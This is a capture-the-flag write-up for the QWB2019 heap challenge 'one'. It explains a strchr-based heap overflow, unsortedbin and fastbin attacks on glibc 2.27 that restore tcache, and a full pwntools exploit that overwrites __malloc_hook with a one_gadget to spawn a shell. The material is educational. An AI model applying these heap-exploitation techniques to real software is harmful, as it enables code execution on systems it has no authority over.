[QWB2019] one

This time I want to share a challange from last weekend’s QWB game, which only allows Chinese team to participate. This particular challenage one, I did not have time to look during the game, but when I solved it, I think it is worth to share. You can download the binary here.

Vulnerability

No surprise, the binary was compiled with full protection.

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

It is a typical menu program with add, edit, show, delete, and the organizor also provided a libc of 2.27 version.

---------menu---------
1. Add String
2. Edit String
3. Show String
4. Del String
5. exit
command>>

I soon identify the vulnerability, it locates in edit function:

unsigned __int64 edit()
{
  int v1; // [rsp+4h] [rbp-1Ch]
  char *v2; // [rsp+8h] [rbp-18h]
  char v3; // [rsp+16h] [rbp-Ah]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  puts("Please give me the index of the string:");
  v1 = get_int();
  if ( v1 < 0 || v1 > 19 )
  {
    puts("Sorry~");
  }
  else if ( LIST[v1] )
  {
    puts("Which char do you want to edit:");
    read_into(&v3, 2LL);
    v2 = strchr((const char *)LIST[v1], v3);    // heap overflow
    if ( v2 )
    {
      puts("What do you want to edit it into:");
      *v2 = getchar();
      getchar();
      puts("Success!");
    }
    else
    {
      puts("Sorry, I can't find it!");
    }
  }
  else
  {
    puts("Sorry~");
  }
  return __readfsqword(0x28u) ^ v4;
}

we can edit the string content char by char, and the strchar could lead to heap overflow. Well, seem not difficult at all, with the tcache poisoning technique, it should be easy enough to solve. However, there is an address sanitization at add function:

void add()
{
  signed int i; // [rsp+Ch] [rbp-4h]

  for ( i = 0; i <= 19; ++i )
  {
    if ( !LIST[i] )
    {
      puts("Now, you can input your test string:");
      LIST[i] = malloc(0x30uLL);
      check_addr((__int64)LIST[i]);
      memset(LIST[i], 0, 0x30uLL);
      read_into(LIST[i], 0x20LL);
      puts("Success!");
      break;
    }
  }
  if ( i == 20 )
    puts("Sorry,there is no free space here.");

and check_addr is like:

__int64 __fastcall check_addr(__int64 addr)
{
  __int64 result; // rax

  if ( addr >= LOW && (result = HIGH, addr <= HIGH) )
    return result;
  puts((const char *)'ror!');
  exit(0);
  return result;
}

LOW and HIGH is initialized when the program start, LOW is the heap address of very first allocation, and HIGH = LOW + 0x5f0.

Oh, it also provided a secret function, which can leak a code address. The leak is a little bit obscure, I’ll spare this part for the readers to explore.

Analyze

If we fill all 20 slot, the bss layout is like following memory dump:

pwndbg> tele 0x555555757040 0x60
00:0000│   0x555555757040 —▸ 0x555555758260 ◂— 0xf89d1d7ee4890aeb <--【LOW】
01:0008│   0x555555757048 ◂— 0x0
... ↓
04:0020│   0x555555757060 —▸ 0x5555557570c0 —▸ 0x555555758350 ◂— 0x3030303030303030 ('00000000')
05:0028│   0x555555757068 —▸ 0x555555757060 —▸ 0x5555557570c0 —▸ 0x555555758350 ◂— 0x3030303030303030 ('00000000')
06:0030│   0x555555757070 ◂— 0x0
... ↓
08:0040│   0x555555757080 —▸ 0x555555758260 ◂— 0xf89d1d7ee4890aeb
09:0048│   0x555555757088 —▸ 0x555555758290 ◂— 0x6f20eac2a115b82b
0a:0050│   0x555555757090 —▸ 0x5555557582c0 ◂— 0x2d5510c9734a0558
0b:0058│   0x555555757098 —▸ 0x5555557582f0 ◂— 0x8461d8781ccdf6e3
0c:0060│   0x5555557570a0 —▸ 0x555555758320 ◂— 0x993b489fbeb13115
0d:0068│   0x5555557570a8 ◂— 0x0
... ↓
10:0080│   0x5555557570c0 —▸ 0x555555758350 ◂— 0x3030303030303030 ('00000000')
11:0088│   0x5555557570c8 —▸ 0x555555758390 ◂— 0x3131313131313131 ('11111111')
12:0090│   0x5555557570d0 —▸ 0x5555557583d0 ◂— 0x3232323232323232 ('22222222')
13:0098│   0x5555557570d8 —▸ 0x555555758410 ◂— 0x3333333333333333 ('33333333')
14:00a0│   0x5555557570e0 —▸ 0x555555758450 ◂— 0x3434343434343434 ('44444444')
15:00a8│   0x5555557570e8 —▸ 0x555555758490 ◂— 0x3535353535353535 ('55555555')
16:00b0│   0x5555557570f0 —▸ 0x5555557584d0 ◂— 0x3636363636363636 ('66666666')
17:00b8│   0x5555557570f8 —▸ 0x555555758510 ◂— 0x3737373737373737 ('77777777')
18:00c0│   0x555555757100 —▸ 0x555555758550 ◂— 0x3838383838383838 ('88888888')
19:00c8│   0x555555757108 —▸ 0x555555758590 ◂— 0x3939393939393939 ('99999999')
1a:00d0│   0x555555757110 —▸ 0x5555557585d0 ◂— 0x3030303030303030 ('00000000')
1b:00d8│   0x555555757118 —▸ 0x555555758610 ◂— 0x3131313131313131 ('11111111')
1c:00e0│   0x555555757120 —▸ 0x555555758650 ◂— 0x3232323232323232 ('22222222')
1d:00e8│   0x555555757128 —▸ 0x555555758690 ◂— 0x3333333333333333 ('33333333')
1e:00f0│   0x555555757130 —▸ 0x5555557586d0 ◂— 0x3434343434343434 ('44444444')
1f:00f8│   0x555555757138 —▸ 0x555555758710 ◂— 0x3535353535353535 ('55555555')
20:0100│   0x555555757140 —▸ 0x555555758750 ◂— 0x3636363636363636 ('66666666')
21:0108│   0x555555757148 —▸ 0x555555758790 ◂— 0x3737373737373737 ('77777777')
22:0110│   0x555555757150 —▸ 0x5555557587d0 ◂— 0x3838383838383838 ('88888888')
23:0118│   0x555555757158 —▸ 0x555555758810 ◂— 0x3939393939393939 ('99999999')
24:0120│   0x555555757160 —▸ 0x555555758850 ◂— 0x0 <--【HIGH】
25:0128│   0x555555757168 ◂— 0x0
... ↓

LOW is 0x555555758260 and HIGH is 0x555555758850, so we can malloc can only return addresses within this range, otherwise, the session died. I considered this as extra mitigation towards tcache poisioning.

We’ve got a code address, a heap overflow. With heap overflow, we can modify 0x555555758350‘s content and overflow it to 0x555555758390‘s chunksize, change it from 0x41 to 0x441, then we delete it and got a chunk in unsortedbin. This allows us to leak libc address and create overlapping chunk, overlapping chunk also helps us to get heap address. So we can have code, libc, heap address, enough for bypassing PIE. What next?

Unsortedbin Attack in Glibc 2.27

A straightforward idea is to unlock the address sanitization by overwriting HIGH variable, with unsortedbin attack. I mentioned unsortedbin attack can be very useful in previous writeup, and how2heap concluded this technique can only apply to glibc without tcache feature, which is < 2.26. But is this true?

After some searching, I found CTF-All-In-One proposed a method. It provided a poc:

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_var = 0;
    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);

    unsigned long *p = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);

    free(p);
    fprintf(stderr, "Freed the first chunk to put it in a tcache bin\n");

    p[0] = (unsigned long)(&stack_var);
    fprintf(stderr, "Overwrite the next ptr with the target address\n");
    malloc(0x80);
    malloc(0x80);
    fprintf(stderr, "Now we malloc twice to make tcache struct's counts '0xff'\n\n");

    free(p);
    fprintf(stderr, "Now free again to put it in unsorted bin\n");
    p[1] = (unsigned long)(&stack_var - 2);
    fprintf(stderr, "Now write its bk ptr with the target address-0x10: %p\n\n", (void*)p[1]);

    malloc(0x80);
    fprintf(stderr, "Finally malloc again to get the chunk at target address: %p -> %p\n", &stack_var, (void*)stack_var);
}

In short, we can change tcache->counts[tc_idx] == 0xff by doing tcache poisioning, and it will get into else statement in following code snippet, which will return directly instead of getting into another round. Noting that mp_.tcache_count = 7 by default.

#if USE_TCACHE
	      /* Fill cache first, return to user only if cache fills.
		 We may return one of these chunks later.  */
	      if (tcache_nb
		  && tcache->counts[tc_idx] < mp_.tcache_count)
		{
		  tcache_put (victim, tc_idx);
		  return_cached = 1;
		  continue;
		}
	      else
		{
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;

Sound good, we can following the steps in poc and do unsortedbin attack against HIGH, in order to unlock the address check mitigation. But once we turn tcache->counts[tc_idx] == 0xff, it means we can no longer utilize this tcache bin, any free chunk of this size(0x40) will get into fastbin. In this challenge, 0x40 is the only size we can allocat, and there is no such fake size around regular control-flow hijack target like __malloc_hook.

Tcache recovering

I want to enable tcache again after unsorted bin attack, so we can perform tcache poisoning easily. I looked into the source of _int_free:

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
...
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
	&& tc_idx < mp_.tcache_bins
	&& tcache->counts[tc_idx] < mp_.tcache_count)
      {
	tcache_put (p, tc_idx);
	return;
      }
  }
#endif
...

Our target is getting into the if statement on line 9, and the key is to make tcache->counts[tc_idx] < mp_.tcache_count become true. What is mp_ then?

pwndbg> p mp_
$1 = {
  trim_threshold = 131072,
  top_pad = 131072,
  mmap_threshold = 131072,
  arena_test = 8,
  arena_max = 0,
  n_mmaps = 0,
  n_mmaps_max = 65536,
  max_n_mmaps = 0,
  no_dyn_threshold = 0,
  mmapped_mem = 0,
  max_mmapped_mem = 0,
  sbrk_base = 0x555555758000 "",
  tcache_bins = 64,  <-- 【fake size of 0x40】
  tcache_max_bytes = 1032,
  tcache_count = 7,
  tcache_unsorted_limit = 0
}
pwndbg> p &mp_
$2 = (struct malloc_par *) 0x7ffff7dcf280 <mp_>

It is a structure in libc, which contains some information of the tcache status. And I spotted there is a fake size 64(0x40) in the structure, right before mp_.tcache_count. We can use fastbin attack to modify mp_.tcache_count here!

pwndbg> p &mp_.tcache_count 
$3 = (size_t *) 0x7ffff7dcf2e0 <mp_+96>
pwndbg> fakefast 0x7ffff7dcf2e0
-- size : 0x40 --
fake chunk : 0x7ffff7dcf2c8  padding : 8       
pwndbg>

Our target is to make tcache->counts[tc_idx] < mp_.tcache_count become true, tcache->counts[tc_idx]=0xffffffffffffffff(-1) now, while the comparison is unsigned, we cannot found any tcache_count to fullfill the condition. However, we can make tcache->counts[tc_idx]=0xfffffffffffffffe(-2) and mp_.tcache_count=0xffffffffffffffff(-1). Then we are good to use tcache again.

Exploitation

Here is the exploit plan:

leak code address
leak libc address
leak heap address
tcache poisioning to make tcache[idx]->count = -2
unsortedbin attack aginst HIGH
fastbin attack against mp_.tcache_count, make it -1.
tcache poisioning against __malloc_hook to one_gadget.

The final exp, this is constructed when ASLR is off, some adjustments is necessary for remote target:

from pwn import *
import re

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
env = {'LD_PRELOAD': ''}
context.log_level = 'debug'

libc = ELF('./libc-2.27.so')

if len(sys.argv) == 1:
    p = process('./one')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])


se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
sea     = lambda delim,data         :p.sendafter(delim, data)
rc      = lambda numb=4096          :p.recv(numb)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :p.info(tag + ': {:#x}'.format(addr))

def add(s):
    sla(">>", "1")
    sea(":", s)

def edit(idx, old, new):
    sla(">>", "2")
    sla("string:", str(idx))
    sea("edit:", old)
    sla("into:", new)

def show(idx):
    sla(">>", "3")
    sla("string:", str(idx))

def delete(idx):
    sla(">>", "4")
    sla("string:", str(idx))

def secret(idx):
    sla(">>", "12580")
    sla(")", "Y")
    sla("?", str(idx))

def fill(idx, content):
    for i in range(len(content)):
        edit(idx, "\x00", content[i])

def replace(idx, old, new):
    for i in range(len(old)-1, -1, -1):
        if old[i] != '\x00':
            edit(idx, old[i] + '\x00', new[i])
        else:
            edit(idx, old[i], new[i])

# leak code
secret(0x80000000)
ru("string:\n")
content = ru("\n\n--")
leak_code = uu64(content)
info_addr("leak_code", leak_code)
bss = leak_code - 0xc0
info_addr("bss", bss)

for i in range(10):
    add(str(i)*0x20)
for i in range(9):
    add(str(i)*0x20)

fill(0, "0"*0x18)
edit(0, "\x41\x00", "\x41")
edit(0, "\x00", "\x04")
delete(1)
add("1"*0x20)
show(2)

# leak libc
ru("is:\n")
content = ru("\n")
leak_libc = uu64(content)
info_addr("leak_libc", leak_libc)
libc.address = leak_libc - 0x3ebca0
info_addr("libc", libc.address)

add("9"*0x20)
delete(18)
delete(19)
show(2)

# leak heap
ru("is:\n")
content = ru("\n")
leak_heap = uu64(content)
info_addr("leak_heap", leak_heap)
heap = leak_heap - 0x7d0
info_addr("heap", heap)

# recover
add("2"*0x20)
add("8"*0x20)

# prepare empty slot 
edit(0, "\x41\x00", "\x81")
for i in range(10, 17):
    fill(i, "0"*0x18)
    edit(i, "\x41\x00", "\x81")
for i in range(11, 18):
    delete(i)

# prepare tcache[idx]->count = -2
delete(5)
fill(4, "4"*0x18)
fill(4, "B"*7)
fill(4, p64(heap + 0x450))
replace(4, "4"*8, "abcdefgh")
replace(4, "hgfedcba", p64(heap + 0x450))
add("C"*0x20)
add("\x00")
add("\x00")

# unsortedbin attack against HIGH
target = bss + 0x160
fill(2, "2"*0x18)
fill(2, "abcdef")
replace(2, p64(leak_libc), "ABCDEFGH")
replace(2, p64(leak_libc), p64(target - 0x10))
edit(2, "G\x00", "\x00")
edit(2, "H\x00", "\x00")
replace(2, "ABCDEF", p64(leak_libc)[:6])
replace(2, "abcdef", "\x00"*6)
edit(2, "\xc1\x00", "\x41")
edit(2, "\x03\x00", "\x00")
add("1"*0x20)
gdb.attach(p, gdbcmd)

# fastbin attack against mp_.tcache_count
mp_target = libc.address + 0x3eb2c8 
delete(7)
fill(6, "2"*0x18)
fill(6, "abcdefg")
fill(6, p64(mp_target)[:6])
replace(6, "abcdefg", "\x00"*7)
add("junk\n")
add("A"*8+ '\xff'+'\xff'*7+"\n")

# tcache poisioning against __malloc_hook
delete(2)
fill(18, p64(libc.symbols['__malloc_hook']))
add("junk\n")
one_gadget = libc.address + 0x10a38c
add(p64(one_gadget))
delete(2)
add("trigger")

p.interactive()

Wrapup

In this writeup, we can see how to perform unsortedbin attack to overwrite a certain variable in glibc 2.27, and recover the tcache feature afterward. I think that the 0x40 size is carefully chosen by the designer, helpping us to get a foothole on mp_ structure. The writeup from r3kpig use another method to change HIGH variable, and this post mentioned the smallbin cache filling mechanisum can also achieve same effect.